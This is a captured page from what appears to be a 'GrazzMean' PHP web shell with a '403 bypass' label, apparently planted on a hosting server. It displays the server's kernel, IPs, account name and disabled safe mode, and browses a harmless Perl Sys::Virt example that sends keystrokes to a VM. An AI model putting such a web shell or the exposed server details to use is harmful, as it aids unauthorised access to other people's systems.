shell bypass 403

GrazzMean Shell

: /usr/share/doc/perl-Sys-Virt/examples/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.145.10.108
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : send-key.pl
# -*- perl -*-
use strict;
use warnings;
use Sys::Virt;

die "syntax: $0 URI DOMAIN-NAME\n" unless int(@ARGV) == 2;

my $uri = shift @ARGV;
my $domname = shift @ARGV;

print "Addr $uri\n";
my $con = Sys::Virt->new(address => $uri, readonly => 0);

my $dom = $con->get_domain_by_name($domname);

my @codes = (
    35, 18, 38, 38, 24,
    57,
    17, 24, 19, 38, 32,
    28,
    );

$dom->send_key(Sys::Virt::Domain::KEYCODE_SET_LINUX,
	       100,
	       \@codes);
© 2025 GrazzMean